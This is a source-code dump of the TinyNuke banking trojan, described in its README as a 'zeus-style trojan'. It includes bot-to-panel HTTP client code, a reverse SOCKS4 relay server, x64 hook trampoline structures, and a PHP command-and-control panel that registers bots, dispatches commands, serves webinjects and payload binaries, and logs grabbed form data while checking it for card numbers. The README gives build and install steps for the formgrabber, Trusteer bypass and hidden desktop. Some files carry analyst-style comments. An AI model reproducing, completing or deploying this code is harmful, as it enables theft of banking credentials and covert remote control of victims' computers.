    UINT32 dummy0;      // displacement part of the encoding shown above
    UINT8  dummy1;      // EB 08:         JMP +10
    UINT8  dummy2;
    UINT64 address;     // Absolute destination address
} CALL_ABS;

// 32-bit direct relative conditional jumps (6 bytes: 2 opcode + 4 displacement).
typedef struct _JCC_REL
{
    UINT8  opcode0;     // 0F8* xxxxxxxx: J** +6+xxxxxxxx
    UINT8  opcode1;
    UINT32 operand;     // Relative destination address
} JCC_REL;

// 64bit indirect absolute conditional jumps that x64 lacks.
// 16 bytes: a 2-byte short conditional jump, then the same 14-byte
// instruction-plus-pointer sequence as JMP_ABS.
typedef struct _JCC_ABS
{
    UINT8  opcode;      // 7* 0E:         J** +16
    UINT8  dummy0;
    UINT8  dummy1;      // FF25 00000000: JMP [+6]
    UINT8  dummy2;
    UINT32 dummy3;
    UINT64 address;     // Absolute destination address
} JCC_ABS;

#pragma pack(pop)

typedef struct _TRAMPOLINE
{
    LPVOID pTarget;         // [In] Address of the target function.
    LPVOID pDetour;         // [In] Address of the detour function.
    LPVOID pTrampoline;     // [In] Buffer address for the trampoline and relay function.

#ifdef _M_X64
    LPVOID pRelay;          // [Out] Address of the relay function.
#endif
    BOOL   patchAbove;      // [Out] Should use the hot patch area?
    UINT   nIP;             // [Out] Number of the instruction boundaries.
    UINT8  oldIPs[8];       // [Out] Instruction boundaries of the target function.
    UINT8  newIPs[8];       // [Out] Instruction boundaries of the trampoline function.
103 | } TRAMPOLINE, *PTRAMPOLINE; 104 | 105 | BOOL CreateTrampolineFunction(PTRAMPOLINE ct); 106 | -------------------------------------------------------------------------------- /Panel.cpp: --------------------------------------------------------------------------------
// Panel.cpp - client side of the bot-to-panel HTTP channel.
//
// Analyst summary of what this file shows:
//  * Every request is an HTTP POST (gRequest.post = TRUE) to
//    PATH + "?" + <bot id> on HOST[gHostIndex]:PORT.
//  * The body returned by the very first request is kept as gKey and is
//    handed to Obfuscate() for every later request body and response body.
//  * When a request fails the code advances to the next HOST entry, sleeps
//    POLL, and retries without a retry limit.
// HOST, PORT, PATH, POLL, Funcs::*, Strs::*, HttpRequestData and
// HttpSubmitRequest are declared outside this file.
#include "Panel.h"
#include "Utils.h"
#include "HTTP.h"

static char            *gKey                   = NULL;   // first response body; reused as the Obfuscate() key
static char             gBotId[BOT_ID_LEN]     = { 0 };  // filled by GetBotId()
static char             gPath [256]            = { 0 };  // PATH + "?" + gBotId
static int              gHostIndex             = 0;      // index of the HOST entry currently in use
static HttpRequestData  gRequest               = { 0 };  // request template copied for each call
static CRITICAL_SECTION gSwitchCritSec;                  // guards gHostIndex in SwitchHost()
static CRITICAL_SECTION gInitCritSec;                    // taken around first-call initialisation

// Advances gHostIndex to the next entry of HOST, wrapping to 0 when the next
// entry is null (HOST is treated as a null-terminated list), then sleeps POLL
// before returning so callers retry at the polling interval.
static void SwitchHost()
{
   Funcs::pEnterCriticalSection(&gSwitchCritSec);
      ++gHostIndex;
      if(!HOST[gHostIndex])
         gHostIndex = 0;
   Funcs::pLeaveCriticalSection(&gSwitchCritSec);
   Funcs::pSleep(POLL);
}

// Initialises gInitCritSec; intended to run once before PanelRequest() is used.
void InitPanelRequest()
{
   Funcs::pInitializeCriticalSection(&gInitCritSec);
}

// Sends `data` to the panel and returns the response body.
//
// data       - NUL-terminated request text; its length is taken with lstrlenA
//              and the buffer is obfuscated IN PLACE before sending.
// outputSize - optional; receives request.outputBodySize.
// Returns request.outputBody after it has been passed through Obfuscate().
// NOTE(review): ownership of the returned buffer is not visible here -
// presumably allocated by HttpSubmitRequest and released by the caller; confirm.
//
// Does not return until a request succeeds: both loops below retry forever.
char *PanelRequest(char *data, int *outputSize)
{
   // First call only: build the request template and fetch the session key.
   // The gKey test happens before the lock is taken.
   if(!gKey)
   {
      EnterCriticalSection(&gInitCritSec);
      Funcs::pInitializeCriticalSection(&gSwitchCritSec);
      // Copied from Strs::pingRequest but not referenced again in this function.
      char request[32] = { 0 };
      Funcs::pLstrcpyA(request, Strs::pingRequest);

      GetBotId(gBotId);

      // URL path carries the bot id as the whole query string.
      Funcs::pLstrcpyA(gPath, PATH);
      Funcs::pLstrcatA(gPath, "?");
      Funcs::pLstrcatA(gPath, gBotId);

      gRequest.host = HOST[gHostIndex];
      gRequest.port = PORT;
      gRequest.path = gPath;
      gRequest.post = TRUE;

      // Retry across the host list until one answers.
      while(!HttpSubmitRequest(gRequest))
      {
         SwitchHost();
         gRequest.host = HOST[gHostIndex];
      }
      // The raw response body of this first exchange becomes the key.
      gKey = (char *) gRequest.outputBody;
      LeaveCriticalSection(&gInitCritSec); //useless
   }
   // Work on a private copy of the template so concurrent callers do not
   // share input/output fields.
   HttpRequestData request;
   Funcs::pMemcpy(&request, &gRequest, sizeof(gRequest));

   request.inputBody     = (BYTE *) data;
   request.inputBodySize = Funcs::pLstrlenA(data);

   // Request body is transformed with gKey before it leaves the host.
   Obfuscate(request.inputBody, request.inputBodySize, gKey);

   while(!HttpSubmitRequest(request))
   {
      SwitchHost();
      // Keep the shared template on the same host as this request.
      request.host  = HOST[gHostIndex];
      gRequest.host = HOST[gHostIndex];
   }
   // Same transform and key are applied to the response body.
   Obfuscate(request.outputBody, request.outputBodySize, gKey);
   if(outputSize)
      *outputSize = request.outputBodySize;
   return (char *) request.outputBody;
}
-------------------------------------------------------------------------------- /Panel.h: -------------------------------------------------------------------------------- 1 | #include "Common.h" 2 | 3 | char *PanelRequest(char *data, int *outputSize); 4 | void InitPanelRequest(); -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # NOTE 2 | This repo is a fork of [one](https://github.com/aainz/TinyNuke) which 3 | has since been deleted by its author. I didn't write the code, but 4 | find it useful (hence, forked it). I don't offer support for it, but don't plan to delete it either. 5 | 6 | Original README follows: 7 | 8 | ---- 9 | 10 | This repository contains the source code of TinyNuke which is a zeus-style trojan written by me. 11 | 12 | Main Features: 13 | ============== 14 | 15 | - Formgrabber and Webinjects for Firefox, Internet Explorer and Chrome. Can inject x86 as well as x64 browsers.
16 | - Reverse SOCKS 4 17 | - HVNC like Hidden Desktop 18 | - Trusteer Bypass 19 | - ~32kb binary with obfuscated strings ~20kb without 20 | 21 | Installation: 22 | ============= 23 | 24 | * To install the panel dump the db.sql file then login with the default panel credentials admin:pass and finally navigate to settings.php 25 | 26 | * Open TinyNuke.sln and provide your server Api.cpp like this: 27 | 28 | Strs::host[0] = ENC_STR_A"127.0.0.1"END_ENC_STR; 29 | Strs::host[1] = ENC_STR_A"backup-server"END_ENC_STR; 30 | Strs::host[2] = 0; 31 | 32 | To obfuscate strings between the ENC_STR_A and END_ENC_STR, backup Api.cpp then use the AutoEncrypt project, a binary is located in the root directory 33 | 34 | * Compile the Bot project for the x64 and x86 platforms and upload the binaries to the panel in the settings page 35 | 36 | * Upload your webinject file, format can be seen in private/injects.json in the panel folder if you have no webinjects provide an empty JSON object "{}" 37 | 38 | * Compile the Loader project to get your PE file 39 | 40 | Usage and additional info can be found within the code (HiddenDesktop/VNC server folder = HiddenDesktop, Reverse SOCKS 4 server = SocksServer) 41 | -------------------------------------------------------------------------------- /SocksServer/SocksServer.sdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/SocksServer/SocksServer.sdf -------------------------------------------------------------------------------- /SocksServer/SocksServer.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SocksServer", "SocksServer\SocksServer.vcxproj", "{0D9481EC-C350-405E-A9BE-A6A837A3CAFD}" 5 | EndProject 6 | Global 7 | 
GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Release|Win32 = Release|Win32 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {0D9481EC-C350-405E-A9BE-A6A837A3CAFD}.Debug|Win32.ActiveCfg = Debug|Win32 13 | {0D9481EC-C350-405E-A9BE-A6A837A3CAFD}.Debug|Win32.Build.0 = Debug|Win32 14 | {0D9481EC-C350-405E-A9BE-A6A837A3CAFD}.Release|Win32.ActiveCfg = Release|Win32 15 | {0D9481EC-C350-405E-A9BE-A6A837A3CAFD}.Release|Win32.Build.0 = Release|Win32 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /SocksServer/SocksServer.v11.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/SocksServer/SocksServer.v11.suo -------------------------------------------------------------------------------- /SocksServer/SocksServer/Server.cpp: -------------------------------------------------------------------------------- 1 | #include "Server.h" 2 | 3 | #define TCP_STREAM_CON 0x01 4 | #define REQUEST_GRANTED 0x5A 5 | #define REQUEST_REJECTED 0x5B 6 | 7 | static const BYTE gc_magik[] = { 'A', 'V', 'E', '_', 'M', 'A', 'R', 'I', 'A', 1 }; 8 | 9 | static BOOL StartServer(INT port, SOCKET *s, SOCKADDR_IN *addr, INT *addrSize) 10 | { 11 | WSADATA wsa; 12 | *addrSize = sizeof(*addr); 13 | if(WSAStartup(MAKEWORD(2, 2), &wsa)) 14 | return FALSE; 15 | if((*s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) 16 | return FALSE; 17 | 18 | (*addr).sin_family = AF_INET; 19 | (*addr).sin_addr.s_addr = INADDR_ANY; 20 | (*addr).sin_port = htons(port); 21 | 22 | if(bind(*s, (sockaddr *) addr, *addrSize) == SOCKET_ERROR) 23 | return FALSE; 24 | if(listen(*s, SOMAXCONN) == SOCKET_ERROR) 25 | return FALSE; 26 | 27 | 
getsockname(*s, (SOCKADDR *) addr, addrSize); 28 | return TRUE; 29 | }

// Moves at most one buffer (2048 bytes) from s_recv to s_send.
// FIONREAD is polled first so the call never blocks on an idle socket; when
// nothing is pending it sleeps 1 ms and reports success.
// Returns FALSE when ioctlsocket fails or when recv/send report 0.
// NOTE(review): `bytes` is a UINT, so the `<= 0` test on recv's result can
// only match 0; a SOCKET_ERROR return is not distinguished here. A short
// send is not retried.
static BOOL QueryProxy(SOCKET s_recv, SOCKET s_send)
{
   UINT bytes = 0;
   if(ioctlsocket(s_recv, FIONREAD, (u_long *) &bytes) == SOCKET_ERROR)
      return FALSE;

   if(bytes)
   {
      char buffer[2048];
      if((bytes = recv(s_recv, buffer, sizeof(buffer), 0)) <= 0)
         return FALSE;
      if(send(s_send, buffer, bytes, 0) <= 0)
         return FALSE;
   }
   else
      Sleep(1);
   return TRUE;
}

// Heap-allocated argument for ClientConnectionThread (freed by that thread).
struct ClientConnectionInfo
{
   SOCKET proxyClientSocket;   // connection accepted on the per-client proxy listener
   SOCKET clientServerSocket;  // listening socket created for this one relay
};

// Relay worker. Accepts a single connection on info->clientServerSocket and
// then alternates QueryProxy() in both directions between it and
// info->proxyClientSocket until either direction fails.
// Only `info` is released on exit; this function calls closesocket on none of
// the three sockets it uses.
static DWORD WINAPI ClientConnectionThread(PVOID param)
{
   SOCKADDR_IN           addr;
   INT                   addrSize = sizeof(addr);
   ClientConnectionInfo *info     = (ClientConnectionInfo *) param;
   SOCKET                clientSocket
      = accept(info->clientServerSocket, (SOCKADDR *) &addr, &addrSize);
   if(clientSocket == INVALID_SOCKET)
      goto exit;

   for (;;)
   {
      if(!QueryProxy(info->proxyClientSocket, clientSocket))
         goto exit;
      if(!QueryProxy(clientSocket, info->proxyClientSocket))
         goto exit;
   }
exit:
   free(info);
   return 0;
}

// Per-client control thread; `param` is the accepted control socket.
//
// Wire behaviour visible in this function (useful when writing network
// signatures or emulating the peer in analysis):
//  1. The client must open with the fixed 10-byte preamble gc_magik,
//     defined earlier in this file as the ASCII bytes "AVE_MARIA" followed by
//     0x01. Anything else ends the session. There is no other authentication.
//  2. A listener is opened on an OS-chosen port (StartServer with port 0) and
//     that port is printed to the console for the operator.
//  3. For every connection accepted on that listener, a second OS-chosen
//     listener is opened and its port number is sent over the control socket
//     as a raw INT (sizeof(INT) bytes, host byte order, no framing).
//     Presumably the client then connects back to that port; the accept for
//     it is in ClientConnectionThread.
//
// NOTE(review): the check after accept() tests `s`, which does not change in
// this function, rather than proxyClientSocket. The three proxy sockets start
// as NULL and are all passed to closesocket at exit regardless of whether
// they were opened. The preamble is read with a single recv; a short read is
// compared as-is.
static DWORD WINAPI ClientThread(PVOID param)
{
   SOCKET      s                  = (SOCKET) param;
   SOCKET      proxySocket        = NULL;
   SOCKET      proxyClientSocket  = NULL;
   SOCKET      clientServerSocket = NULL;
   BYTE        buf[sizeof(gc_magik)];
   SOCKADDR_IN addr;
   INT         addrSize;

   addrSize = sizeof(addr);
   getpeername(s, (SOCKADDR *) &addr, &addrSize);

   // inet_ntoa returns a pointer to a static buffer; `ip` is reused in the
   // log lines below.
   char *ip = inet_ntoa(addr.sin_addr);
   wprintf(L"Client %S connected\n", ip);

   // Step 1: fixed preamble check.
   if(recv(s, (char *) buf, sizeof(gc_magik), 0) <= 0)
      goto exit;

   if(memcmp(buf, gc_magik, sizeof(gc_magik)))
      goto exit;

   // Step 2: per-client proxy listener on an ephemeral port.
   if(!StartServer(0, &proxySocket, &addr, &addrSize))
      goto exit;

   wprintf(L"Client %S proxy port = %d\n", ip, ntohs(addr.sin_port));

   for(;;)
   {
      proxyClientSocket = accept(proxySocket, (SOCKADDR *) &addr, &addrSize);

      if(s == INVALID_SOCKET)
         goto exit;

      // Step 3: one more ephemeral listener per proxied connection.
      if(!StartServer(0, &clientServerSocket, &addr, &addrSize))
         goto exit;

      // Port is announced to the client over the control socket.
      INT port = ntohs(addr.sin_port);
      if(send(s, (char *) &port, sizeof(port), 0) <= 0)
         goto exit;

      ClientConnectionInfo *info
         = (ClientConnectionInfo *) malloc(sizeof(*info));
      if(!info)
         goto exit;

      info->clientServerSocket = clientServerSocket;
      info->proxyClientSocket  = proxyClientSocket;

      // Ownership of `info` passes to the worker thread.
      if(!CreateThread(NULL, 0, ClientConnectionThread, (LPVOID) info, 0, 0))
         goto exit;
   }
exit:
   wprintf(L"Client %S disconnected\n", ip);
   closesocket(s);
   closesocket(proxySocket);
   closesocket(proxyClientSocket);
   closesocket(clientServerSocket);
   return 0;
}

139 | BOOL ReverseSocksServer::Start(INT port) 140 | { 141 | SOCKET serverSocket; 142 | SOCKADDR_IN addr; 143 | INT addrSize; 144 | if(!StartServer(port, &serverSocket, &addr, &addrSize)) 145 | return FALSE; 146 | wprintf(L"Reverse SOCKS 4 Server Started! 
Listening on port %d\n", ntohs(addr.sin_port)); 147 | 148 | for(;;) 149 | { 150 | SOCKET s; 151 | SOCKADDR_IN addr; 152 | s = accept(serverSocket, (SOCKADDR *) &addr, &addrSize); 153 | if(s != INVALID_SOCKET) 154 | { 155 | if(!CreateThread(NULL, 0, ClientThread, (LPVOID) s, 0, 0)) 156 | return FALSE; 157 | } 158 | } 159 | return TRUE; 160 | } -------------------------------------------------------------------------------- /SocksServer/SocksServer/Server.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | #pragma comment(lib, "ws2_32.lib") 8 | 9 | namespace ReverseSocksServer 10 | { 11 | BOOL Start(INT port); 12 | } -------------------------------------------------------------------------------- /SocksServer/SocksServer/SocksServer.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | 14 | {0D9481EC-C350-405E-A9BE-A6A837A3CAFD} 15 | Win32Proj 16 | SocksServer 17 | 18 | 19 | 20 | Application 21 | true 22 | v110_xp 23 | Unicode 24 | 25 | 26 | Application 27 | false 28 | v110_xp 29 | true 30 | Unicode 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | true 44 | 45 | 46 | false 47 | 48 | 49 | 50 | 51 | 52 | Level3 53 | Disabled 54 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 55 | 56 | 57 | Console 58 | true 59 | 60 | 61 | 62 | 63 | Level3 64 | 65 | 66 | MaxSpeed 67 | true 68 | true 69 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 70 | MultiThreaded 71 | 72 | 73 | Console 74 | true 75 | true 76 | true 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | -------------------------------------------------------------------------------- /SocksServer/SocksServer/SocksServer.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 
{4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | 26 | 27 | Header Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /SocksServer/SocksServer/SocksServer.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 6666 5 | WindowsLocalDebugger 6 | 7 | -------------------------------------------------------------------------------- /SocksServer/SocksServer/main.cpp: -------------------------------------------------------------------------------- 1 | #include "Server.h" 2 | 3 | int main(int argc, char **argv) 4 | { 5 | if(argc < 1) 6 | wprintf(L"Port not provided\n"); 7 | else if(!ReverseSocksServer::Start(atoi(argv[1]))) 8 | wprintf(L"Could not start the server (Error: %d)\n", WSAGetLastError()); 9 | getchar(); 10 | return 0; 11 | } -------------------------------------------------------------------------------- /TinyNuke.VC.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/TinyNuke.VC.db -------------------------------------------------------------------------------- /TinyNuke.sdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/TinyNuke.sdf -------------------------------------------------------------------------------- /TinyNuke.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 
12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Loader", "Loader\Loader.vcxproj", "{AB612859-E2DD-46A0-94B7-49616C6D7365}" 5 | EndProject 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Bot", "Bot\Bot.vcxproj", "{8C66E36C-51F6-410F-8678-64358BC78BF7}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Win32 = Debug|Win32 11 | Debug|x64 = Debug|x64 12 | Release|Win32 = Release|Win32 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {AB612859-E2DD-46A0-94B7-49616C6D7365}.Debug|Win32.ActiveCfg = Debug|Win32 17 | {AB612859-E2DD-46A0-94B7-49616C6D7365}.Debug|Win32.Build.0 = Debug|Win32 18 | {AB612859-E2DD-46A0-94B7-49616C6D7365}.Debug|x64.ActiveCfg = Debug|x64 19 | {AB612859-E2DD-46A0-94B7-49616C6D7365}.Debug|x64.Build.0 = Debug|x64 20 | {AB612859-E2DD-46A0-94B7-49616C6D7365}.Release|Win32.ActiveCfg = interceptor|Win32 21 | {AB612859-E2DD-46A0-94B7-49616C6D7365}.Release|Win32.Build.0 = interceptor|Win32 22 | {AB612859-E2DD-46A0-94B7-49616C6D7365}.Release|x64.ActiveCfg = interceptor|x64 23 | {AB612859-E2DD-46A0-94B7-49616C6D7365}.Release|x64.Build.0 = interceptor|x64 24 | {8C66E36C-51F6-410F-8678-64358BC78BF7}.Debug|Win32.ActiveCfg = Debug|Win32 25 | {8C66E36C-51F6-410F-8678-64358BC78BF7}.Debug|Win32.Build.0 = Debug|Win32 26 | {8C66E36C-51F6-410F-8678-64358BC78BF7}.Debug|x64.ActiveCfg = Debug|x64 27 | {8C66E36C-51F6-410F-8678-64358BC78BF7}.Debug|x64.Build.0 = Debug|x64 28 | {8C66E36C-51F6-410F-8678-64358BC78BF7}.Release|Win32.ActiveCfg = interceptor|Win32 29 | {8C66E36C-51F6-410F-8678-64358BC78BF7}.Release|Win32.Build.0 = interceptor|Win32 30 | {8C66E36C-51F6-410F-8678-64358BC78BF7}.Release|x64.ActiveCfg = interceptor|x64 31 | {8C66E36C-51F6-410F-8678-64358BC78BF7}.Release|x64.Build.0 = interceptor|x64 32 | EndGlobalSection 33 | GlobalSection(SolutionProperties) = preSolution 34 | HideSolutionNode = 
FALSE 35 | EndGlobalSection 36 | EndGlobal 37 | -------------------------------------------------------------------------------- /TinyNuke.v11.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/TinyNuke.v11.suo -------------------------------------------------------------------------------- /Utils.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "Common.h" 3 | 4 | #define BOT_ID_LEN 35 5 | 6 | void GetBotId(char *botId); 7 | void Obfuscate(BYTE *buffer, DWORD bufferSize, char *key); 8 | char *Utf16toUtf8(wchar_t *utf16); 9 | wchar_t *Utf8toUtf16(char *utf8); 10 | char *UnEnc(char *enc, char *key, DWORD encLen); 11 | void GetInstallPath(char *installPath); 12 | BOOL GetUserSidStr(PCHAR *sidStr); 13 | HANDLE NtRegOpenKey(PCHAR subKey); 14 | void SetStartupValue(char *path); 15 | BOOL VerifyPe(BYTE *pe, DWORD peSize); 16 | BOOL IsProcessX64(HANDLE hProcess); 17 | void *Alloc(size_t size); 18 | void *AllocZ(size_t size); 19 | void *ReAlloc(void *mem, size_t size); 20 | DWORD GetPidExplorer(); 21 | void SetFirefoxPrefs(); 22 | void DisableMultiProcessesAndProtectedModeIe(); 23 | void GetDlls(BYTE **x86, BYTE **x64, BOOL update); 24 | void GetTempPathBotPrefix(char *path); 25 | DWORD BypassTrusteer(PROCESS_INFORMATION *processInfo, char *browserPath, char *browserCommandLine); 26 | void CopyDir(char *from, char *to); -------------------------------------------------------------------------------- /enc.cmd: -------------------------------------------------------------------------------- 1 | AutoEncrypt.exe Api.cpp -------------------------------------------------------------------------------- /panel/bots.php: -------------------------------------------------------------------------------- 1 | 8 |
9 |
Search
10 |
11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 21 | 33 | 34 |
Country Codes
UHIDs
IPs
20 | 22 | 23 | Order By 24 | 28 | 32 |
35 |
36 |
37 | bindValue(++$i, $country, PDO::PARAM_STR); 66 | } 67 | if($_GET['uhids'] != '') 68 | { 69 | foreach($uhids as $uhid) 70 | $query->bindValue(++$i, $uhid, PDO::PARAM_STR); 71 | } 72 | if($_GET['ips'] != '') 73 | { 74 | foreach($ips as $ip) 75 | $query->bindValue(++$i, $ip, PDO::PARAM_INT); 76 | } 77 | } 78 | 79 | $query = $db->prepare('SELECT COUNT(*) FROM bots WHERE 1 = 1'.$sqlWhere); 80 | $i = 0; 81 | bind_values(); 82 | $query->execute(); 83 | $total = $query->fetchColumn(); 84 | if($total == 0) 85 | echo('
No bots found
'); 86 | else 87 | { 88 | get_pag_vars($total, $pages, $page, $offset); 89 | $query = $db->prepare('SELECT * FROM bots WHERE 1 = 1'.$sqlWhere.' ORDER BY '.($_GET['order'] == 1 ? 'first_seen' : 'last_seen').' 90 | '.($_GET['dir'] == 1 ? 'ASC' : 'DESC').' LIMIT ? OFFSET ?'); 91 | $i = 0; 92 | bind_values(); 93 | $query->bindValue(++$i, $CONST_PAGE_LIMIT, PDO::PARAM_INT); 94 | $query->bindValue(++$i, $offset, PDO::PARAM_INT); 95 | $query->execute(); 96 | ?> 97 |
98 |
Results
99 | 100 | 101 | fetchAll(); 103 | $geoip = new GeoIP(); 104 | foreach($rows as $row) 105 | { 106 | ?> 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 120 | 123 | 126 | 127 | '); 130 | echo_pag_form($page, $pages); 131 | echo(''); 132 | } 133 | } 134 | ui_content_end(); 135 | ui_end(); 136 | ?> -------------------------------------------------------------------------------- /panel/client.php: -------------------------------------------------------------------------------- 1 | prepare('SELECT last_command FROM bots WHERE uhid = ?'); 47 | $query->bindValue(1, $uhid, PDO::PARAM_STR); 48 | $query->execute(); 49 | if($query->rowCount() === 0) 50 | { 51 | echo xor_obf('0', $key); 52 | exit(); 53 | } 54 | 55 | $last_command = $query->fetchColumn(); 56 | $country = get_country($ip); 57 | 58 | $query = $db->prepare('SELECT * FROM commands WHERE (execs <= `limit` OR `limit` = 0) AND enabled = 1 AND (id > ? OR ? = 0)'); 59 | $query->bindValue(1, $last_command, PDO::PARAM_INT); 60 | $query->bindValue(2, $last_command, PDO::PARAM_INT); 61 | $query->execute(); 62 | $rows = $query->fetchAll(); 63 | $output = ''; 64 | foreach($rows as $row) 65 | { 66 | if($row['countries'] != '') 67 | { 68 | $countries = explode(' ', $row['countries']); 69 | if(!in_array($country, $countries)) 70 | continue; 71 | } 72 | if($row['uhids'] != '') 73 | { 74 | $uhids = explode(' ', $row['uhids']); 75 | if(!in_array($uhid, $uhids)) 76 | continue; 77 | } 78 | $query = $db->prepare('UPDATE commands SET execs = execs + 1 WHERE id = ?'); 79 | $query->bindValue(1, $row['id'], PDO::PARAM_INT); 80 | $query->execute(); 81 | $last_command = $row['id']; 82 | if($row['type'] == $CONST_COMMAND_HIDDEN_DESKTOP) 83 | $row['param'] = $CONF_SERVER_HIDDEN_DESKTOP; 84 | else 85 | if($row['type'] == $CONST_COMMAND_SOCKS) 86 | $row['param'] = $CONF_SERVER_SOCKS; 87 | $output .= $row['type'].'|'.$row['param']."\r\n"; 88 | } 89 | $query = $db->prepare('UPDATE bots SET last_seen = ?, ip = ?, country = ?, last_command = ? 
WHERE uhid = ?'); 90 | $query->bindValue(1, time(), PDO::PARAM_INT); 91 | $query->bindValue(2, $ipLong, PDO::PARAM_INT); 92 | $query->bindValue(3, $country, PDO::PARAM_STR); 93 | $query->bindValue(4, $last_command, PDO::PARAM_INT); 94 | $query->bindValue(5, $uhid, PDO::PARAM_STR); 95 | $query->execute(); 96 | echo xor_obf($output, $key); 97 | } 98 | else if($requestType == 'info') 99 | { 100 | $parts = explode('|', $parts[1]); 101 | $query = $db->prepare('INSERT INTO bots (uhid, os_major, os_minor, service_pack, is_server, ip, 102 | comp_name, user_name, is_x64, last_seen, first_seen, country, last_command) 103 | VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, 0)'); 104 | $query->bindValue(1, $uhid, PDO::PARAM_STR); 105 | $query->bindValue(2, $parts[0], PDO::PARAM_INT); 106 | $query->bindValue(3, $parts[1], PDO::PARAM_INT); 107 | $query->bindValue(4, $parts[2], PDO::PARAM_INT); 108 | $query->bindValue(5, $parts[3], PDO::PARAM_INT); 109 | $query->bindValue(6, $ipLong, PDO::PARAM_INT); 110 | $query->bindValue(7, $parts[4], PDO::PARAM_STR); 111 | $query->bindValue(8, $parts[5], PDO::PARAM_STR); 112 | $query->bindValue(9, $parts[6], PDO::PARAM_INT); 113 | $time = time(); 114 | $query->bindValue(10, $time, PDO::PARAM_INT); 115 | $query->bindValue(11, $time, PDO::PARAM_INT); 116 | $query->bindValue(12, get_country($ip)); 117 | $query->execute(); 118 | } 119 | else if($requestType == 'injects') 120 | { 121 | $injects = file_get_contents($CONST_INJECTS_PATH); 122 | $injects = str_replace("%BOT_ID%", $uhid, $injects); 123 | $injects = str_replace("%COUNTRY%", get_country($ip), $injects); 124 | echo xor_obf($injects, $key); 125 | } 126 | else if($requestType == 'log') 127 | { 128 | $parts = explode('|', $parts[1], 4); 129 | $query = $db->prepare('INSERT INTO reports (uhid, software, url, inject, received, content, found_card) 130 | VALUES (?, ?, ?, ?, ?, ?, ?)'); 131 | $query->bindValue(1, $uhid, PDO::PARAM_STR); //UHID|Chrome|Url|Inject|Content 132 | $query->bindValue(2, 
$parts[0], PDO::PARAM_STR); 133 | $query->bindValue(3, $parts[1], PDO::PARAM_STR); 134 | $query->bindValue(4, $parts[2], PDO::PARAM_INT); 135 | $query->bindValue(5, time(), PDO::PARAM_INT); 136 | $query->bindValue(6, $parts[3], PDO::PARAM_STR); 137 | $query->bindValue(7, found_card($parts[3]), PDO::PARAM_INT); 138 | $query->execute(); 139 | } 140 | else if($requestType == 'bin') 141 | { 142 | $path = ''; 143 | if($parts[1] === 'int32') 144 | $path = $CONST_X86_BIN_PATH; 145 | else 146 | $path = $CONST_X64_BIN_PATH; 147 | $content = file_get_contents($path); 148 | echo xor_obf($content, $key); 149 | } 150 | ?> -------------------------------------------------------------------------------- /panel/commands.php: -------------------------------------------------------------------------------- 1 | prepare('DELETE FROM commands WHERE id = ?'); 11 | $query->bindValue(1, $_GET['delete'], PDO::PARAM_INT); 12 | $query->execute(); 13 | header('location: commands.php'); 14 | exit(); 15 | } 16 | 17 | if(isset($_GET['toggle'])) 18 | { 19 | action_sec_check(); 20 | $query = $db->prepare('UPDATE commands SET enabled = NOT enabled WHERE id = ?'); 21 | $query->bindValue(1, $_GET['toggle'], PDO::PARAM_INT); 22 | $query->execute(); 23 | header('location: commands.php'); 24 | exit(); 25 | } 26 | 27 | if(isset($_POST['type'])) 28 